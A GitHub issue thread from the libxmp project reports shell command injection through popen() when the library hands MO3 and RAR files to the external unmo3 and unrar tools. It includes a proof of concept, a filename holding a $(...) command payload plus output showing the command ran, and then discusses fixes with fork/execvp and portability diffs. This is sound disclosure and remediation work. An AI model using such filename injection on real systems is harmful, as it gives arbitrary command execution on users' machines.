### ISSUE TITLE
Shell command injection when calling external unmo3 or unrar

### ISSUE THREAD

**Issue by debrouxl** [libxmp/libxmp#327]
I noticed this while sifting through the output of valgrind as part of triaging the remaining issues from #323 .
At https://github.com/libxmp/libxmp/blob/master/src/load.c#L167 , libxmp delegates depacking for >= 100-byte files which start with "MO3" or "Rar" magic numbers to external `unmo3` and `unrar` tools, respectively. AFAICT, there's no format string injection in that path, as the filename is correctly pasted through `%s`... but there's a much bigger issue: `popen()` is being used, https://github.com/libxmp/libxmp/blob/master/src/load.c#L95 and below. Therefore, I looked for a command injection vulnerability based on the file name; indeed, there is command injection.

PoC:
```
$ echo -n 'MO34567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890' > '$(echo command injection > foo; LANG=C date >> foo; cat foo)'

$ LD_LIBRARY_PATH=~/xmp_prefix_nosan/lib ~/xmp_prefix_nosan/bin/xmp --load-only '$(echo command injection > foo; LANG=C date >> foo; cat foo)'; cat foo
Extended Module Player 4.1.0
Copyright (C) 1996-2016 Claudio Matsuoka and Hipolito Carraro Jr
Using null output
Mixer set to 44100 Hz, 16bit, cubic spline interpolated stereo
Press 'h' for help

Loading $(echo command injection > foo; LANG=C date >> foo; cat foo) (1 of 1)
Can not open STDOUT
.../xmp_prefix_nosan/bin/xmp: $(echo command injection > foo; LANG=C date >> foo; cat foo): Unrecognized file format
command injection
Sun Mar 21 23:26:59 CET 2021

$ echo -n 'Rar34567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890' > '$(echo command injection > foo; LANG=C date >> foo; cat foo)'

$ LD_LIBRARY_PATH=~/xmp_prefix_nosan/lib ~/xmp_prefix_nosan/bin/xmp --load-only '$(echo command injection > foo; LANG=C date >> foo; cat foo)'; cat foo
Extended Module Player 4.1.0
Copyright (C) 1996-2016 Claudio Matsuoka and Hipolito Carraro Jr
Using null output
Mixer set to 44100 Hz, 16bit, cubic spline interpolated stereo
Press 'h' for help

Loading $(echo command injection > foo; LANG=C date >> foo; cat foo) (1 of 1)
Can not open STDOUT
.../xmp_prefix_nosan/bin/xmp: $(echo command injection > foo; LANG=C date >> foo; cat foo): Unrecognized file format
command injection
Sun Mar 21 23:27:04 CET 2021
```

The `xmp` front-end is usually launched from a shell or a file explorer anyway (i.e. the user can normally already launch commands), but still - opening oddly named files containing the MO3 or RAR magic numbers (which might themselves be embedded into other archive formats, right ?) opens the door to arbitrary command execution with the privileges of the current user. I can't see a privilege escalation here on most modern computers which don't have setuid/setgid binaries left and right, and usually have proper ownership and mode on system binaries.
The call to `popen()` was already there in `src/misc/load.c` at the beginning of the Git history in June 2001, though at the time, and for a number of years after that, more external programs than just `unmo3` and `unrar` were executed.

The only correct way to launch external programs I'm aware of, is:
* not to depend on any form of external shell;
* build the argv array for the target program;
* set up file descriptors as needed to gather stdout (and stderr, if needed) from the target program;
* use functions from the `fork`+`exec` (*nix) or `spawn` (Windows) families.
Needless to say, this is inherently non-portable...

**Comment by AliceLR** [comment]
As a stopgap presumably either the filename could be sanitized or the file contents could be copied to a tempfile. Relying on external commands in general doesn't seem great but there might not be a cleaner option for either MO3 or RAR.

> (which might themselves be embedded into other archive formats, right ?)

libxmp currently doesn't recursively unpack files and as far as I can tell it only attempts to use unmo3/rar if no other depacker can handle it.

**Comment by debrouxl** [comment]
I must say I'm no big fan of sanitizing metacharacters from file names, since it's easy to either perform insufficient sanitization, or reject valid file names, especially on *nix, where only 0x00 and '/' are invalid in file names. Copying the file contents to a temp file made using `tmpfile()` (C89, BSD, POSIX) or better but less portable, `mkstemp()` (BSD, POSIX), sounds like a better measure to me :)

ACK about no recursive unpacking, that's a good thing.

**Comment by AliceLR** [comment]
> I must say I'm no big fan of sanitizing metacharacters from file names, since it's easy to either perform insufficient sanitization, or reject valid file names, especially on *nix, where only 0x00 and '/' are invalid in file names. Copying the file contents to a temp file made using `tmpfile()` (C89, BSD, POSIX) or better but less portable, `mkstemp()` (BSD, POSIX), sounds like a better measure to me :)

I agree. libxmp appears to already have a portable `mkstemp` implementation that it uses for Windows/etc via `make_temp_file` that could be used.

**Comment by AliceLR** [comment]
After "careful" consideration, making a duplicate of an arbitrarily-sized file maybe isn't the best idea. The fork/execv and Win32 solution really sucks less somehow (and maybe could get rid of the popen dependency and `src/win32/ptpopen.c`). (Win32 execv IIRC uses CreateProcess internally if some weird argv bugs I've encountered are any indicator, so thanks for pointing me towards `_spawn`.)

**Comment by AliceLR** [comment]
Some more observations:
* The _spawn solution can't redirect output, so it requires providing a filename to the command line arguments for output. Presumably this would be fine but it means Windows needs a unique arguments list vs. everything else that can pipe/fork/execvp stdout.
* The redirected output solution for Windows is essentially what ptpopen.c already does. Allegedly CreateProcess shouldn't even be vulnerable to shell injection, so ptpopen.c might be fine as-is. Any resources re: CreateProcess vulnerabilities definitely would be appreciated but the main thing I found was malformed command line strings with a NULL command can cause problems when CreateProcess tries to tokenize the former to generate the latter (shouldn't be an issue here).

**Comment by AliceLR** [comment]
Bad proof-of-concept for a fix here: <https://github.com/libxmp/libxmp/compare/master...AliceLR:depack-fork-exec>.

**Comment by debrouxl** [comment]
This pipe/fork/execvp code is what I had in mind. ACK about the usage of Win32 CreateProcess for redirecting output, I never had to implement output redirection for processes launched by `spawn`.

**Comment by sezero** [comment]
A few notes:
- That `memcpy(cmd, unmo3_cmd, sizeof(unmo3_cmd));` looks scary:
  Are you sure it's correct? Anyways it bombs out with watcom builds with
  `src/load.c(231): Error! E1054: Expression must be constant` errors.
  I suggest manual assigning like:
```diff
diff --git a/src/load.c b/src/load.c
index acbc033..10a6ffc 100644
--- a/src/load.c
+++ b/src/load.c
@@ -227,20 +227,26 @@ static int decrunch(HIO_HANDLE **h, const char *filename, char **temp)
        if (depacker == NULL) {
                if (b[0] == 'M' && b[1] == 'O' && b[2] == '3') {
                        /* MO3 */
-                       const char *unmo3_cmd[] = {
-                               "unmo3", "-s", filename, "STDOUT", NULL
-                       };
                        D_(D_INFO "mo3");
-                       memcpy(cmd, unmo3_cmd, sizeof(unmo3_cmd));
+                       cmd[0] = "unmo3";
+                       cmd[1] = "-s";
+                       cmd[2] = filename;
+                       cmd[3] = "STDOUT";
+                       cmd[4] = NULL;
                } else if (memcmp(b, "Rar", 3) == 0) {
                        /* rar */
-                       const char *unrar_cmd[] = {
-                               "unrar", "p", "-inul", "-xreadme", "-x*.diz",
-                               "-x*.nfo", "-x*.txt", "-x*.exe", "-x*.com",
-                               filename, NULL
-                       };
                        D_(D_INFO "rar");
-                       memcpy(cmd, unrar_cmd, sizeof(unrar_cmd));
+                       cmd[0] = "unrar";
+                       cmd[1] = "p";
+                       cmd[2] = "-inul";
+                       cmd[3] = "-xreadme";
+                       cmd[4] = "-x*.diz";
+                       cmd[5] = "-x*.nfo";
+                       cmd[6] = "-x*.txt";
+                       cmd[7] = "-x*.exe";
+                       cmd[8] = "-x*.com";
+                       cmd[9] = filename;
+                       cmd[10] = NULL;
                } else if (test_oxm(f) == 0) {
                        /* oggmod */
                        D_(D_INFO "oggmod");
```

- I get execvp() const warnings:
```
src/load.c:159: warning: passing argument 2 of ‘execvp’ from incompatible pointer type
/usr/include/unistd.h:575: note: expected ‘char * const*’ but argument is of type ‘const char * const*’
```

- You need to make sure fork() & co are available at configure time, I guess.

**Comment by AliceLR** [comment]
> * That `memcpy(cmd, unmo3_cmd, sizeof(unmo3_cmd));` looks scary:
>   Are you sure it's correct? Anyways it bombs out with watcom builds with
>   `src/load.c(231): Error! E1054: Expression must be constant` errors.

I think technically it should work correctly but it's also kind of bad. Not sure why Watcom can't handle non-constant stack allocation but I agree that's probably a better solution anyway.

> * I get execvp() const warnings:
> 
> ```
> src/load.c:159: warning: passing argument 2 of ‘execvp’ from incompatible pointer type
> /usr/include/unistd.h:575: note: expected ‘char * const*’ but argument is of type ‘const char * const*’
> ```

This is because, for whatever reason, `execvp` doesn't use `const char *const *` for argv even though the `execv*` functions are guaranteed to not modify the provided argv. This is IMO a bad API decision. I think for now the `const` just needs to be casted off.

> * You need to make sure fork() & co are available at configure time, I guess.

It also needs a bit of refactoring and maybe should be moved out of load.c...

**Comment by sezero** [comment]
Minor: ponylips.rar is compressed with a new version of rar, can't unrar it
with e.g. unrar 3.80 or 4.0.7: recreating the rar with `-ma4` switch should
help.

**Comment by AliceLR** [comment]
Alright, I repacked that RAR with `-ma4` and `rar -vta` indicates it should be a RAR 4 now. I also added configure detection for `wait`/`pipe`/`fork`/`execvp`/etc and changed the Windows behavior re: `popen` (before, it could use the MinGW `popen` which is presumably a thin wrapper around Win32's problematic `_popen` implementation. Now it always uses `pt_popen`.)

**Comment by sezero** [comment]
Here is a ponylips.rar made using rar2.50 for dos using v1 compression scheme
[ponylips.rar.zip](https://github.com/libxmp/libxmp/files/6215424/ponylips.rar.zip)

This one plays using mikmod under dos (dosbox), but I have trouble making
libxmp to work with it.

One trouble is configure _detects_ fork() & co for djgpp, but they are stupid nops
only returning failure. Will try looking into.

**Comment by sezero** [comment]
Forcing djgpp to use popen kind of works, but the result is broken:
it outputs 21929 bytes instead of 21894 bytes. Manually running
`unrar p -inul` on the rar file gives the same result. A comparison
of hexdumps of the outputs shows 0x0a -> `0x0d 0x0a` changes. Tried
inserting `setmode(fileno(stdout),O_BINARY);` calls, no effect. Sigh.

(Obviously this is very low priority.)

**Comment by sezero** [comment]
Anyways, it'd be good to do the following change, even if doesn't seem to work at the moment:
```diff
diff --git a/configure.ac b/configure.ac
index 15e00a3..d35c450 100644
--- a/configure.ac
+++ b/configure.ac
@@ -188,7 +188,14 @@ darwin*|mingw*)
   ;;
 esac
 AC_CHECK_HEADERS(dirent.h)
-AC_CHECK_FUNCS(wait pipe fork execvp dup2 popen mkstemp fnmatch umask round powf)
+AC_CHECK_FUNCS(dup2 popen mkstemp fnmatch umask round powf)
+dnl fork, execv & co don't work with djgpp
+case "${host_os}" in
+*djgpp|mingw*)
+  ;;
+*) AC_CHECK_FUNCS(wait pipe fork execvp)
+  ;;
+esac
 
 AC_CONFIG_FILES([Makefile])
 AC_CONFIG_FILES([libxmp.pc])
diff --git a/src/load.c b/src/load.c
index 5642e1e..520b09b 100644
--- a/src/load.c
+++ b/src/load.c
@@ -107,7 +107,7 @@ int test_oxm		(FILE *);
     defined(HAVE_DUP2) && defined(HAVE_WAIT)
 #define DECRUNCH_USE_FORK
 #elif defined(HAVE_POPEN) && \
-    (defined(_WIN32) || defined(__OS2__) || defined(__EMX__))
+    (defined(_WIN32) || defined(__OS2__) || defined(__EMX__) || defined(__DJGPP__))
 #define DECRUNCH_USE_POPEN
 #else
 static int execute_command(const char * const cmd[], FILE *t) {
```

**Comment by AliceLR** [comment]
That's strange—does DJGPP always force text mode on stdout? I wonder if it'd be better to just have a list of platforms where external depackers are force-disabled.

I still don't really like the external depackers being a thing at all. How widely available is [libunarr](https://github.com/selmf/unarr)? Linking that (or pulling its RAR support in as contrib code) would at least get rid of unrar usage. Not as sure about MO3.

**Comment by sezero** [comment]
> That's strange—does DJGPP always force text mode on stdout?

Don't know for sure.  Will ask on djgpp mailing lists.

> I wonder if it'd be better to just have a list of platforms where external depackers are force-disabled.

Maybe a good idea..

> I still don't really like the external depackers being a thing at all. How widely available is [libunarr](https://github.com/selmf/unarr)? Linking that (or pulling its RAR support in as contrib code) would at least get rid of unrar usage.

rpmfind.net says it's packaged with fedora. packages.debian.org says it's packaged with debian.

> Not as sure about MO3, but [unmo3](https://github.com/lclevy/unmo3)'s README recommends looking at OpenMPT's MO3 support (how much are these things used anyway?).

Really don't know about mo3 thing

**Comment by sezero** [comment]
> > That's strange—does DJGPP always force text mode on stdout?
> 
> Don't know for sure. Will ask on djgpp mailing lists.

Sent a mail to djgpp mailing list:
http://www.delorie.com/djgpp/mail-archives/browse.cgi?p=djgpp/2021/03/27/09:39:20
Not holding my breath, though.

**Comment by sezero** [comment]
> > Don't know for sure. Will ask on djgpp mailing lists.
> 
> Sent a mail to djgpp mailing list:
> http://www.delorie.com/djgpp/mail-archives/browse.cgi?p=djgpp/2021/03/27/09:39:20

Got responses, _possibly_ an issue with unrar dos exe itself.

**Comment by AliceLR** [comment]
@cmatsuoka any thoughts re: this issue?

**Comment by AliceLR** [comment]
After a closer look at ptpopen.c it is non-reentrant. Since it's known to likely not be vulnerable to shell injection, I think a good idea might be to make it reentrant and limit the `popen` usage to specifically ptpopen.c/MinGW/MSVC builds only.

**Comment by AliceLR** [comment]
I (finally) got around to addressing the ptpopen.c reentrancy issue. I'm going to go ahead and open a pull request for this branch now so it can at least get reviewed (not sure it's actually ready though).
